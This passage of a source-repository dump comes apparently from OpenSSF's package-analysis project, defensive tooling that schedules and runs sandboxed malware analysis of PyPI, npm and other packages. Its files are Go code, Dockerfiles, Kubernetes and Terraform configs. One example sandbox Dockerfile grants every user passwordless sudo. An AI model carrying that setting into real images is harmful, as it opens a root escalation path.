fmt.Fprintf(os.Stderr, "\n") 127 | } 128 | fmt.Fprintf(os.Stderr, "%v\n", err) 129 | os.Exit(1) 130 | } 131 | } 132 | -------------------------------------------------------------------------------- /cmd/scheduler/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:1.23.1@sha256:4a3c2bcd243d3dbb7b15237eecb0792db3614900037998c2cd6a579c46888c1e as build 2 | WORKDIR /src 3 | 4 | # First cache the dependencies to avoid downloading again on code change 5 | COPY ./go.mod ./ 6 | COPY ./go.sum ./ 7 | RUN go mod download 8 | 9 | COPY . ./ 10 | RUN CGO_ENABLED=0 go build -o scheduler ./cmd/scheduler/main.go 11 | 12 | 13 | FROM gcr.io/distroless/base:nonroot@sha256:bc84925113289d139a9ef2f309f0dd7ac46ea7b786f172ba9084ffdb4cbd9490 14 | 15 | COPY --from=build /src/scheduler /usr/local/bin/scheduler 16 | 17 | ENTRYPOINT ["/usr/local/bin/scheduler"] 18 | -------------------------------------------------------------------------------- /cmd/scheduler/README.md: -------------------------------------------------------------------------------- 1 | # Scheduler 2 | 3 | This directory contains code to schedule analysis jobs based on incoming package update 4 | notifications from [Package Feeds](https://github.com/ossf/package-feeds) 5 | 6 | ## Overview 7 | 8 | The Scheduler is a Golang app that runs on Kubernetes and is deployed with [ko](https://github.com/google/ko). 9 | It is currently deployed in a GKE cluster. 10 | 11 | ### Local deployment 12 | 13 | Install ko 14 | 15 | ```bash 16 | go install github.com/google/ko@latest 17 | ``` 18 | 19 | Then run 20 | 21 | ```bash 22 | KO_DOCKER_REPO=gcr.io/ossf-malware-analysis ko resolve -f deployment.yaml | kubectl apply -f - 23 | ``` 24 | 25 | ## Design 26 | 27 | Package Feeds provides a Pub/Sub feed that provides package update notifications. 28 | Each such notification corresponds to a single package event (update / new package). 29 | 30 | The Scheduler handles ACKing the Package Feeds Pub/Sub feed, filtering out package ecosystems that are unsupported by Package Analysis and sending out another Pub/Sub notification to the Worker which triggers the actual analysis. The Worker then downloads, installs and imports (where applicable) the corresponding package, and monitors runtime behaviour. 31 | 32 | The following ecosystems are supported 33 | - [`PyPI`](https://pypi.org/) 34 | - [`npmjs`](https://registry.npmjs.org/) 35 | - [`RubyGems`](https://rubygems.org/) 36 | - [`cargo`](https://crates.io/) 37 | - [`Packagist`](https://packagist.org/) 38 | -------------------------------------------------------------------------------- /cmd/scheduler/config/deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: scheduler-deployment 5 | labels: 6 | app: scheduler 7 | spec: 8 | replicas: 1 9 | selector: 10 | matchLabels: 11 | app: scheduler 12 | template: 13 | metadata: 14 | labels: 15 | app: scheduler 16 | spec: 17 | containers: 18 | - name: app 19 | image: ko://github.com/ossf/package-analysis/cmd/scheduler 20 | env: 21 | - name: OSSMALWARE_SUBSCRIPTION_URL 22 | value: gcppubsub://projects/ossf-malware-analysis/subscriptions/feed-subscription 23 | - name: OSSMALWARE_WORKER_TOPIC 24 | value: gcppubsub://projects/ossf-malware-analysis/topics/workers 25 | - name: LOGGER_ENV 26 | value: prod 27 | -------------------------------------------------------------------------------- /cmd/scheduler/proxy/proxy.go: -------------------------------------------------------------------------------- 1 | package proxy 2 | 3 | import ( 4 | "context" 5 | "log/slog" 6 | 7 | "github.com/ossf/package-analysis/internal/log" 8 | "gocloud.dev/pubsub" 9 | ) 10 | 11 | type MessageMutateFunc func(*pubsub.Message) (*pubsub.Message, error) 12 | 13 | type PubSubProxy struct { 14 | topic *pubsub.Topic 15 | subscription *pubsub.Subscription 16 | } 17 | 18 | func New(topic *pubsub.Topic, subscription *pubsub.Subscription) *PubSubProxy { 19 | return &PubSubProxy{ 20 | topic: topic, 21 | subscription: subscription, 22 | } 23 | } 24 | 25 | func (proxy *PubSubProxy) Listen(ctx context.Context, preprocess MessageMutateFunc) error { 26 | for { 27 | msg, err := proxy.subscription.Receive(ctx) 28 | if err != nil { 29 | slog.ErrorContext(ctx, "Error receiving message", "error", err) 30 | return err 31 | } 32 | go func(m *pubsub.Message) { 33 | innerCtx := log.ContextWithAttrs(ctx, slog.String("message_id", m.LoggableID)) 34 | outMsg, err := preprocess(msg) 35 | if err != nil { 36 | // Failure to parse and process messages should result in an acknowledgement 37 | // to avoid the message being redelivered. 38 | slog.WarnContext(innerCtx, "Error processing message", "error", err) 39 | m.Ack() 40 | return 41 | } 42 | slog.InfoContext(innerCtx, "Sending message to topic") 43 | if err := proxy.topic.Send(ctx, outMsg); err != nil { 44 | slog.ErrorContext(ctx, "Error sending message", "error", err) 45 | return 46 | } 47 | slog.InfoContext(innerCtx, "Sent message successfully") 48 | msg.Ack() 49 | }(msg) 50 | } 51 | } 52 | -------------------------------------------------------------------------------- /cmd/worker/config.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "log/slog" 5 | "os" 6 | 7 | "github.com/ossf/package-analysis/internal/resultstore" 8 | "github.com/ossf/package-analysis/internal/worker" 9 | ) 10 | 11 | // resultBucketPaths holds bucket paths for the different types of results. 12 | type resultBucketPaths struct { 13 | analyzedPkg string 14 | dynamicAnalysis string 15 | executionLog string 16 | fileWrites string 17 | staticAnalysis string 18 | } 19 | 20 | type sandboxImageSpec struct { 21 | tag string 22 | noPull bool 23 | } 24 | 25 | type config struct { 26 | imageSpec sandboxImageSpec 27 | 28 | resultStores *worker.ResultStores 29 | 30 | subURL string 31 | packagesBucket string 32 | notificationTopicURL string 33 | 34 | userAgentExtra string 35 | } 36 | 37 | func (c *config) LogValue() slog.Value { 38 | return slog.GroupValue( 39 | slog.String("subscription", c.subURL), 40 | slog.String("package_bucket", c.packagesBucket), 41 | slog.String("dynamic_results_store", c.resultStores.DynamicAnalysis.String()), 42 | slog.String("static_results_store", c.resultStores.StaticAnalysis.String()), 43 | slog.String("file_write_results_store", c.resultStores.FileWrites.String()), 44 | slog.String("analyzed_packages_store", c.resultStores.AnalyzedPackage.String()), 45 | slog.String("execution_log_store", c.resultStores.ExecutionLog.String()), 46 | slog.String("image_tag", c.imageSpec.tag), 47 | slog.Bool("image_nopull", c.imageSpec.noPull), 48 | slog.String("topic_notification", c.notificationTopicURL), 49 | slog.String("user_agent_extra", c.userAgentExtra), 50 | ) 51 | } 52 | 53 | func resultStoreForEnv(key string) *resultstore.ResultStore { 54 | val := os.Getenv(key) 55 | if val == "" { 56 | return nil 57 | } 58 | return resultstore.New(val, resultstore.ConstructPath()) 59 | } 60 | 61 | func configFromEnv() *config { 62 | return &config{ 63 | imageSpec: sandboxImageSpec{ 64 | tag: os.Getenv("OSSF_SANDBOX_IMAGE_TAG"), 65 | noPull: os.Getenv("OSSF_SANDBOX_NOPULL") != "", 66 | }, 67 | resultStores: &worker.ResultStores{ 68 | AnalyzedPackage: resultStoreForEnv("OSSF_MALWARE_ANALYZED_PACKAGES"), 69 | DynamicAnalysis: resultStoreForEnv("OSSF_MALWARE_ANALYSIS_RESULTS"), 70 | ExecutionLog: resultStoreForEnv("OSSF_MALWARE_ANALYSIS_EXECUTION_LOGS"), 71 | FileWrites: resultStoreForEnv("OSSF_MALWARE_ANALYSIS_FILE_WRITE_RESULTS"), 72 | StaticAnalysis: resultStoreForEnv("OSSF_MALWARE_STATIC_ANALYSIS_RESULTS"), 73 | }, 74 | subURL: os.Getenv("OSSMALWARE_WORKER_SUBSCRIPTION"), 75 | packagesBucket: os.Getenv("OSSF_MALWARE_ANALYSIS_PACKAGES"), 76 | notificationTopicURL: os.Getenv("OSSF_MALWARE_NOTIFICATION_TOPIC"), 77 | 78 | userAgentExtra: os.Getenv("OSSF_MALWARE_USER_AGENT_EXTRA"), 79 | } 80 | } 81 | -------------------------------------------------------------------------------- /cmd/worker/pubsubextender/gcpdriver.go: -------------------------------------------------------------------------------- 1 | package pubsubextender 2 | 3 | import ( 4 | "context" 5 | "errors" 6 | "fmt" 7 | "net/url" 8 | "path" 9 | "regexp" 10 | "strings" 11 | "time" 12 | 13 | api "cloud.google.com/go/pubsub/apiv1" 14 | pb "cloud.google.com/go/pubsub/apiv1/pubsubpb" 15 | "gocloud.dev/pubsub" 16 | "gocloud.dev/pubsub/gcppubsub" 17 | ) 18 | 19 | const ( 20 | gcpMinAckDeadline = 10 * time.Second 21 | gcpMaxAckDeadline = 600 * time.Second 22 | ) 23 | 24 | var subscriptionPathRE = regexp.MustCompile("^projects/.+/subscriptions/.+$") 25 | 26 | type gcpDriver struct { 27 | client *api.SubscriberClient 28 | path string 29 | } 30 | 31 | func newGCPDriver(u *url.URL, sub *pubsub.Subscription) (driver, error) { 32 | d := &gcpDriver{} 33 | 34 | if u.Scheme != gcppubsub.Scheme { 35 | return nil, errors.New("unsupported scheme") 36 | } 37 | 38 | subPath := path.Join(u.Host, u.Path) 39 | if !subscriptionPathRE.MatchString(subPath) { 40 | // assume the Host is Project ID and Path is the subscription 41 | subPath = fmt.Sprintf("projects/%s/subscriptions/%s", u.Host, strings.TrimPrefix(u.Path, "/")) 42 | } 43 | 44 | var c *api.SubscriberClient 45 | if !sub.As(&c) { 46 | return nil, errors.New("not a GCP subscription") 47 | } 48 | d.client = c 49 | d.path = subPath 50 | return d, nil 51 | } 52 | 53 | // ExtendMessageDeadline implements the driver interface. 54 | func (d *gcpDriver) ExtendMessageDeadline(ctx context.Context, msg *pubsub.Message, deadline time.Duration) error { 55 | // Ensure the deadline is within acceptable bounds. 56 | if deadline < gcpMinAckDeadline { 57 | deadline = gcpMinAckDeadline 58 | } else if deadline > gcpMaxAckDeadline { 59 | deadline = gcpMaxAckDeadline 60 | } 61 | 62 | var rm *pb.ReceivedMessage 63 | if !msg.As(&rm) { 64 | return errors.New("not a gcp message") 65 | } 66 | 67 | if err := d.client.ModifyAckDeadline(ctx, &pb.ModifyAckDeadlineRequest{ 68 | Subscription: d.path, 69 | AckIds: []string{rm.AckId}, 70 | AckDeadlineSeconds: int32(deadline / time.Second), 71 | }); err != nil { 72 | return fmt.Errorf("failed to extend message deadline: %w", err) 73 | } 74 | 75 | return nil 76 | } 77 | 78 | // GetSubscriptionDeadline implements the driver interface. 79 | func (d *gcpDriver) GetSubscriptionDeadline(ctx context.Context) (time.Duration, error) { 80 | resp, err := d.client.GetSubscription(ctx, &pb.GetSubscriptionRequest{Subscription: d.path}) 81 | if err != nil { 82 | return 0, err 83 | } 84 | return time.Duration(resp.GetAckDeadlineSeconds()) * time.Second, nil 85 | } 86 | -------------------------------------------------------------------------------- /cmd/worker/pubsubextender/noopdriver.go: -------------------------------------------------------------------------------- 1 | package pubsubextender 2 | 3 | import ( 4 | "context" 5 | "time" 6 | 7 | "gocloud.dev/pubsub" 8 | ) 9 | 10 | type noopDriver struct{} 11 | 12 | // ExtendMessageDeadline implements the driver interface. 13 | func (d *noopDriver) ExtendMessageDeadline(ctx context.Context, msg *pubsub.Message, deadline time.Duration) error { 14 | return nil 15 | } 16 | 17 | // GetSubscriptionDeadline implements the driver interface. 18 | func (d *noopDriver) GetSubscriptionDeadline(ctx context.Context) (time.Duration, error) { 19 | return 0, nil 20 | } 21 | -------------------------------------------------------------------------------- /configs/e2e/.gitignore: -------------------------------------------------------------------------------- 1 | data/ 2 | -------------------------------------------------------------------------------- /configs/e2e/config/feeds.yml: -------------------------------------------------------------------------------- 1 | feeds: 2 | - type: pypi 3 | - type: rubygems 4 | - type: packagist 5 | - type: npm 6 | - type: crates 7 | publisher: 8 | type: kafka 9 | config: 10 | brokers: ["kafka:9092"] 11 | topic: "package-feeds" 12 | 13 | poll_rate: "10h" 14 | -------------------------------------------------------------------------------- /docs/images/Pipeline diagram.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ossf/package-analysis/80e6c59660156ccd5213932b383cebd14e5a3d4c/docs/images/Pipeline diagram.png -------------------------------------------------------------------------------- /docs/images/npm_depconf-typosquat_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ossf/package-analysis/80e6c59660156ccd5213932b383cebd14e5a3d4c/docs/images/npm_depconf-typosquat_1.png -------------------------------------------------------------------------------- /docs/images/npm_random_vouchercode-generator_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ossf/package-analysis/80e6c59660156ccd5213932b383cebd14e5a3d4c/docs/images/npm_random_vouchercode-generator_1.png -------------------------------------------------------------------------------- /docs/images/npm_random_vouchercode-generator_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ossf/package-analysis/80e6c59660156ccd5213932b383cebd14e5a3d4c/docs/images/npm_random_vouchercode-generator_2.png -------------------------------------------------------------------------------- /docs/images/npm_roku_web_core-ajax_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ossf/package-analysis/80e6c59660156ccd5213932b383cebd14e5a3d4c/docs/images/npm_roku_web_core-ajax_1.png -------------------------------------------------------------------------------- /docs/images/pypi_discordcmd_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ossf/package-analysis/80e6c59660156ccd5213932b383cebd14e5a3d4c/docs/images/pypi_discordcmd_1.png -------------------------------------------------------------------------------- /docs/images/pypi_discordcmd_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ossf/package-analysis/80e6c59660156ccd5213932b383cebd14e5a3d4c/docs/images/pypi_discordcmd_2.png -------------------------------------------------------------------------------- /docs/images/pypi_secrevthree_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ossf/package-analysis/80e6c59660156ccd5213932b383cebd14e5a3d4c/docs/images/pypi_secrevthree_1.png -------------------------------------------------------------------------------- /examples/README.md: -------------------------------------------------------------------------------- 1 | # Examples 2 | 3 | - [e2e](e2e/README.md) - A docker-compose deployment with a `package-feeds` -> `scheduler` -> `Analysis` -------------------------------------------------------------------------------- /examples/custom-sandbox/Dockerfile: -------------------------------------------------------------------------------- 1 | # Example dockerfile for testing an alternative ecosystem version (PHP v7.4) 2 | 3 | FROM php:7.4-zts-bullseye@sha256:a6d14c89da749f4a316846a97174c48304e605298a5fcf93d53bfbaa58b1fb04 AS image 4 | 5 | # Install Composer 6 | RUN php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');" && \ 7 | php -r "if (hash_file('sha384', 'composer-setup.php') === '55ce33d7678c5a611085589f1f3ddf8b3c52d662cd01d4ba75c0ee0459970c2200a51f492d557530c71c15d8dba01eae') { echo 'Installer verified'; } else { echo 'Installer corrupt'; unlink('composer-setup.php'); } echo PHP_EOL;" && \ 8 | php composer-setup.php && \ 9 | php -r "unlink('composer-setup.php');" && \ 10 | mv composer.phar /usr/local/bin/ 11 | 12 | RUN apt-get update && \ 13 | apt-get install -y \ 14 | curl \ 15 | wget \ 16 | git \ 17 | unzip \ 18 | libzip-dev \ 19 | libpng-dev \ 20 | sudo 21 | 22 | # Configure sudo for passwordless execution 23 | RUN echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers 24 | 25 | RUN docker-php-ext-install zip && \ 26 | docker-php-ext-install gd 27 | 28 | COPY analyze.php /usr/local/bin/ 29 | RUN chmod 755 /usr/local/bin/analyze.php 30 | RUN mkdir -p /app 31 | 32 | FROM scratch 33 | COPY --from=image / / 34 | WORKDIR /app 35 | 36 | ENTRYPOINT [ "sleep" ] 37 | 38 | CMD [ "30m" ] 39 | -------------------------------------------------------------------------------- /examples/custom-sandbox/Makefile: -------------------------------------------------------------------------------- 1 | # This Makefile contains commands for building the example custom sandbox and syncing it to the local container cache 2 | 3 | # Registry for Docker images built and used by package analysis 4 | REGISTRY := gcr.io/ossf-malware-analysis 5 | IMAGE_NAME := dynamic-analysis-custom 6 | 7 | # Build the sandbox 8 | build_example_sandbox: DOCKERFILE=$(SANDBOX_DIR)/example/Dockerfile 9 | docker build -t ${REGISTRY}/$(IMAGE_NAME) 10 | 11 | # Update (sync) locally built sandbox images from Docker to podman. 12 | # This is needed for local analysis; in order to use the updated image, 13 | # pass '-nopull' to scripts/run_analysis.sh 14 | # 15 | sync_example_sandbox: 16 | sudo buildah pull docker-daemon:${REGISTRY}/${IMAGE_NAME} 17 | -------------------------------------------------------------------------------- /examples/custom-sandbox/README.md: -------------------------------------------------------------------------------- 1 | This directory gives an example of how to build a custom sandbox for testing or development with a different analysis flow. 2 | In particular, this Docker image and analysis script can be used to analyse Packagist packages with a different version of PHP. 3 | 4 | 5 | -------------------------------------------------------------------------------- /function/loader/README.md: -------------------------------------------------------------------------------- 1 | # Loader 2 | 3 | This runs periodically as a Cloud Function to load analysis results into 4 | BigQuery. 5 | 6 | We use this instead of the BigQuery Data Transfer service as it does not support 7 | load jobs with `WRITE_TRUNCATE`. 8 | 9 | To deploy, run the following command in this directory (/function/loader): 10 | 11 | ## Dynamic analysis results 12 | 13 | ```bash 14 | gcloud functions deploy load-data \ 15 | --region=us-central1 \ 16 | --project=ossf-malware-analysis \ 17 | --entry-point=Load \ 18 | --memory=512MB \ 19 | --runtime=go121 \ 20 | --timeout=120s \ 21 | --trigger-topic=load-data \ 22 | --set-env-vars=OSSF_MALWARE_ANALYSIS_RESULTS=ossf-malware-analysis-results,GCP_PROJECT=ossf-malware-analysis 23 | ``` 24 | 25 | ## Static analysis results 26 | 27 | ```bash 28 | gcloud functions deploy load-staticanalysis-data \ 29 | --region=us-central1 \ 30 | --project=ossf-malware-analysis \ 31 | --entry-point=LoadStaticAnalysis \ 32 | --memory=512MB \ 33 | --runtime=go121 \ 34 | --timeout=120s \ 35 | --trigger-topic=load-data \ 36 | --set-env-vars=OSSF_MALWARE_STATIC_ANALYSIS_RESULTS=ossf-malware-static-analysis-results-v1,GCP_PROJECT=ossf-malware-analysis 37 | ``` 38 | -------------------------------------------------------------------------------- /function/loader/go.mod: -------------------------------------------------------------------------------- 1 | module github.com/ossf/package-analysis/loader 2 | 3 | go 1.23.1 4 | 5 | require cloud.google.com/go/bigquery v1.65.0 6 | 7 | require ( 8 | cloud.google.com/go v0.118.0 // indirect 9 | cloud.google.com/go/auth v0.14.0 // indirect 10 | cloud.google.com/go/auth/oauth2adapt v0.2.7 // indirect 11 | cloud.google.com/go/compute/metadata v0.6.0 // indirect 12 | cloud.google.com/go/iam v1.3.1 // indirect 13 | github.com/apache/arrow/go/v15 v15.0.2 // indirect 14 | github.com/felixge/httpsnoop v1.0.4 // indirect 15 | github.com/go-logr/logr v1.4.2 // indirect 16 | github.com/go-logr/stdr v1.2.2 // indirect 17 | github.com/goccy/go-json v0.10.4 // indirect 18 | github.com/golang/groupcache v0.0.0-20241129210726-2c02b8208cf8 // indirect 19 | github.com/google/flatbuffers v24.12.23+incompatible // indirect 20 | github.com/google/s2a-go v0.1.9 // indirect 21 | github.com/google/uuid v1.6.0 // indirect 22 | github.com/googleapis/enterprise-certificate-proxy v0.3.4 // indirect 23 | github.com/googleapis/gax-go/v2 v2.14.1 // indirect 24 | github.com/klauspost/compress v1.17.11 // indirect 25 | github.com/klauspost/cpuid/v2 v2.2.9 // indirect 26 | github.com/pierrec/lz4/v4 v4.1.22 // indirect 27 | github.com/zeebo/xxh3 v1.0.2 // indirect 28 | go.opentelemetry.io/auto/sdk v1.1.0 // indirect 29 | go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc v0.58.0 // indirect 30 | go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.58.0 // indirect 31 | go.opentelemetry.io/otel v1.33.0 // indirect 32 | go.opentelemetry.io/otel/metric v1.33.0 // indirect 33 | go.opentelemetry.io/otel/trace v1.33.0 // indirect 34 | golang.org/x/crypto v0.32.0 // indirect 35 | golang.org/x/exp v0.0.0-20250106191152-7588d65b2ba8 // indirect 36 | golang.org/x/mod v0.22.0 // indirect 37 | golang.org/x/net v0.34.0 // indirect 38 | golang.org/x/oauth2 v0.25.0 // indirect 39 | golang.org/x/sync v0.10.0 // indirect 40 | golang.org/x/sys v0.29.0 // indirect 41 | golang.org/x/text v0.21.0 // indirect 42 | golang.org/x/time v0.9.0 // indirect 43 | golang.org/x/tools v0.29.0 // indirect 44 | golang.org/x/xerrors v0.0.0-20240903120638-7835f813f4da // indirect 45 | google.golang.org/api v0.216.0 // indirect 46 | google.golang.org/genproto v0.0.0-20250106144421-5f5ef82da422 // indirect 47 | google.golang.org/genproto/googleapis/api v0.0.0-20250106144421-5f5ef82da422 // indirect 48 | google.golang.org/genproto/googleapis/rpc v0.0.0-20250106144421-5f5ef82da422 // indirect 49 | google.golang.org/grpc v1.69.4 // indirect 50 | google.golang.org/protobuf v1.36.2 // indirect 51 | ) 52 | -------------------------------------------------------------------------------- /function/loader/load.go: -------------------------------------------------------------------------------- 1 | package loader 2 | 3 | import ( 4 | "context" 5 | _ "embed" 6 | "fmt" 7 | "os" 8 | 9 | "cloud.google.com/go/bigquery" 10 | ) 11 | 12 | //go:embed dynamic-analysis-schema.json 13 | var dynamicAnalysisSchemaJSON []byte 14 | 15 | //go:embed static-analysis-schema.json 16 | var staticAnalysisSchemaJSON []byte 17 | 18 | type PubSubMessage struct { 19 | Data []byte `json:"data"` 20 | } 21 | 22 | func runAndWaitForJob(ctx context.Context, loader *bigquery.Loader) error { 23 | job, err := loader.Run(ctx) 24 | if err != nil { 25 | return fmt.Errorf("failed to create load job: %v", err) 26 | } 27 | 28 | fmt.Printf("load job created: %s\n", job.ID()) 29 | 30 | status, err := job.Wait(ctx) 31 | if err != nil { 32 | return fmt.Errorf("error waiting for job: %w", err) 33 | } 34 | 35 | if status.Err() != nil { 36 | fmt.Printf("job completed with %d errors\n", len(status.Errors)) 37 | for idx, err := range status.Errors { 38 | fmt.Printf("error %d: %v\n", idx, err) 39 | } 40 | 41 | return status.Err() 42 | } 43 | 44 | return nil 45 | } 46 | 47 | func Load(ctx context.Context, m PubSubMessage) error { 48 | project := os.Getenv("GCP_PROJECT") 49 | bucket := os.Getenv("OSSF_MALWARE_ANALYSIS_RESULTS") 50 | 51 | bq, err := bigquery.NewClient(ctx, project) 52 | if err != nil { 53 | return fmt.Errorf("failed to create BigQuery client: %w", err) 54 | } 55 | defer bq.Close() 56 | 57 | schema, err := bigquery.SchemaFromJSON(dynamicAnalysisSchemaJSON) 58 | if err != nil { 59 | return fmt.Errorf("failed to decode schema: %w", err) 60 | } 61 | 62 | gcsRef := bigquery.NewGCSReference(fmt.Sprintf("gs://%s/*.json", bucket)) 63 | gcsRef.Schema = schema 64 | gcsRef.SourceFormat = bigquery.JSON 65 | gcsRef.MaxBadRecords = 10000 66 | 67 | dataset := bq.Dataset("packages") 68 | loader := dataset.Table("analysis").LoaderFrom(gcsRef) 69 | loader.WriteDisposition = bigquery.WriteTruncate 70 | loader.TimePartitioning = &bigquery.TimePartitioning{ 71 | Type: bigquery.DayPartitioningType, 72 | Field: "CreatedTimestamp", 73 | } 74 | 75 | return runAndWaitForJob(ctx, loader) 76 | } 77 | 78 | func LoadStaticAnalysis(ctx context.Context, m PubSubMessage) error { 79 | project := os.Getenv("GCP_PROJECT") 80 | bucket := os.Getenv("OSSF_MALWARE_STATIC_ANALYSIS_RESULTS") 81 | 82 | bq, err := bigquery.NewClient(ctx, project) 83 | if err != nil { 84 | return fmt.Errorf("failed to create BigQuery client: %w", err) 85 | } 86 | defer bq.Close() 87 | 88 | schema, err := bigquery.SchemaFromJSON(staticAnalysisSchemaJSON) 89 | if err != nil { 90 | return fmt.Errorf("failed to decode schema: %w", err) 91 | } 92 | 93 | gcsRef := bigquery.NewGCSReference(fmt.Sprintf("gs://%s/*.json", bucket)) 94 | gcsRef.Schema = schema 95 | gcsRef.SourceFormat = bigquery.JSON 96 | gcsRef.MaxBadRecords = 10000 97 | 98 | dataset := bq.Dataset("packages") 99 | loader := dataset.Table("staticanalysis").LoaderFrom(gcsRef) 100 | loader.WriteDisposition = bigquery.WriteTruncate 101 | loader.TimePartitioning = &bigquery.TimePartitioning{ 102 | Type: bigquery.DayPartitioningType, 103 | Field: "created", 104 | } 105 | 106 | return runAndWaitForJob(ctx, loader) 107 | } 108 | -------------------------------------------------------------------------------- /infra/README.md: -------------------------------------------------------------------------------- 1 | # Package Analysis Infrastructure 2 | 3 | This directory contains all the configuration, documentation and scripts needed 4 | to manage the package analysis infrastructure. 5 | 6 | ## Production Cluster 7 | 8 | The Production cluster runs in GCP. 9 | 10 | To access the cluster, run: 11 | 12 | ```shell 13 | $ gcloud container clusters get-credentials analysis-cluster --zone=us-central1-c --project=ossf-malware-analysis 14 | ``` 15 | 16 | ### Updating Container Images 17 | 18 | To update container images, run: 19 | 20 | ```shell 21 | $ cd build 22 | $ make push_all_images 23 | ``` 24 | -------------------------------------------------------------------------------- /infra/cloudbuild/dynamic_loader/cloudbuild.yaml: -------------------------------------------------------------------------------- 1 | steps: 2 | - name: gcr.io/google.com/cloudsdktool/cloud-sdk 3 | env: 4 | - 'PROJECT_ID=ossf-malware-analysis' 5 | - 'LOAD_DATASET=loading' 6 | - 'LOAD_TABLE_PREFIX=merge_' 7 | - 'DEST_DATASET=packages' 8 | - 'DEST_TABLE=analysis' 9 | - 'RESULT_BUCKET=gs://ossf-malware-analysis-results' 10 | - 'SCHEMA_FILE=function/loader/dynamic-analysis-schema.json' 11 | entrypoint: '/bin/bash' 12 | args: ['scripts/bq_load.sh'] 13 | timeout: 43200s # 12 hours 14 | options: 15 | logging: CLOUD_LOGGING_ONLY 16 | -------------------------------------------------------------------------------- /infra/cloudbuild/image_build/cloudbuild.yaml: -------------------------------------------------------------------------------- 1 | steps: 2 | - name: 'gcr.io/cloud-builders/docker' 3 | env: 4 | - 'RELEASE_TAG=$TAG_NAME' 5 | entrypoint: make 6 | args: ['cloudbuild'] 7 | timeout: 2400s 8 | -------------------------------------------------------------------------------- /infra/terraform/analysis.tf: -------------------------------------------------------------------------------- 1 | provider "google" { 2 | project = var.project 3 | region = var.region 4 | } 5 | 6 | terraform { 7 | backend "gcs" { 8 | bucket = "ossf-analysis-tf-state" 9 | prefix = "terraform/state" 10 | } 11 | } 12 | 13 | module "docker_registry" { 14 | source = "./docker_registry" 15 | 16 | project = var.project 17 | } 18 | 19 | module "build" { 20 | source = "./build" 21 | 22 | project = var.project 23 | github_owner = var.github_owner 24 | github_repo = var.github_repo 25 | } 26 | 27 | module "metrics" { 28 | source = "./metrics" 29 | 30 | project = var.project 31 | } -------------------------------------------------------------------------------- /infra/terraform/build/main.tf: -------------------------------------------------------------------------------- 1 | # Google Cloud Build Triggers 2 | 3 | resource "google_cloudbuild_trigger" "image-build-trigger" { 4 | name = "image-build-trigger" 5 | project = var.project 6 | 7 | github { 8 | owner = var.github_owner 9 | name = var.github_repo 10 | push { 11 | tag = "^rel-[0-9]+$" 12 | } 13 | } 14 | 15 | filename = "build/cloudbuild.yaml" 16 | } 17 | -------------------------------------------------------------------------------- /infra/terraform/build/variables.tf: -------------------------------------------------------------------------------- 1 | variable "project" {} 2 | variable "github_owner" {} 3 | variable "github_repo" {} 4 | -------------------------------------------------------------------------------- /infra/terraform/docker_registry/main.tf: -------------------------------------------------------------------------------- 1 | resource "google_artifact_registry_repository" "gcr_docker" { 2 | provider = google-beta 3 | 4 | project = var.project 5 | location = "us" 6 | repository_id = "gcr.io" 7 | description = "gcr.io docker container registry for OSSF Malware Analysis Images" 8 | format = "DOCKER" 9 | } 10 | 11 | resource "google_artifact_registry_repository" "us_gcr_docker" { 12 | provider = google-beta 13 | 14 | project = var.project 15 | location = "us" 16 | repository_id = "us.gcr.io" 17 | description = "us.gcr.io docker container registry for OSSF Malware Analysis Images" 18 | format = "DOCKER" 19 | } 20 | 21 | resource "google_artifact_registry_repository_iam_policy" "policy" { 22 | provider = google-beta 23 | 24 | project = google_artifact_registry_repository.gcr_docker.project 25 | location = google_artifact_registry_repository.gcr_docker.location 26 | repository = google_artifact_registry_repository.gcr_docker.name 27 | policy_data = data.google_iam_policy.public_registry_policy.policy_data 28 | } 29 | 30 | data "google_iam_policy" "public_registry_policy" { 31 | binding { 32 | role = "roles/artifactregistry.reader" 33 | 34 | members = [ 35 | "allUsers", 36 | ] 37 | } 38 | } -------------------------------------------------------------------------------- /infra/terraform/docker_registry/variables.tf: -------------------------------------------------------------------------------- 1 | variable "project" {} 2 | -------------------------------------------------------------------------------- /infra/terraform/metrics/variables.tf: -------------------------------------------------------------------------------- 1 | variable "project" {} 2 | -------------------------------------------------------------------------------- /infra/terraform/terraform.tfvars: -------------------------------------------------------------------------------- 1 | project = "ossf-malware-analysis" 2 | region = "us-central1" 3 | github_owner = "ossf" 4 | github_repo = "package-analysis" -------------------------------------------------------------------------------- /infra/terraform/variables.tf: -------------------------------------------------------------------------------- 1 | variable "project" {} 2 | variable "region" {} 3 | variable "github_owner" {} 4 | variable "github_repo" {} 5 | -------------------------------------------------------------------------------- /infra/worker/scaler.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: autoscaling/v2beta2 2 | kind: HorizontalPodAutoscaler 3 | metadata: 4 | name: pubsub 5 | spec: 6 | minReplicas: 1 7 | maxReplicas: 1500 8 | metrics: 9 | - external: 10 | metric: 11 | name: pubsub.googleapis.com|subscription|num_undelivered_messages 12 | selector: 13 | matchLabels: 14 | resource.labels.subscription_id: workers 15 | target: 16 | type: AverageValue 17 | averageValue: 1 18 | type: External 19 | scaleTargetRef: 20 | apiVersion: apps/v1 21 | kind: Deployment 22 | name: workers-deployment 23 | -------------------------------------------------------------------------------- /infra/worker/workers-set.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: workers-deployment 5 | labels: 6 | app: workers 7 | spec: 8 | replicas: 200 9 | selector: 10 | matchLabels: 11 | app: workers 12 | template: 13 | metadata: 14 | labels: 15 | app: workers 16 | spec: 17 | containers: 18 | - name: worker 19 | image: gcr.io/ossf-malware-analysis/analysis:latest 20 | imagePullPolicy: Always 21 | command: ["worker"] 22 | env: 23 | - name: 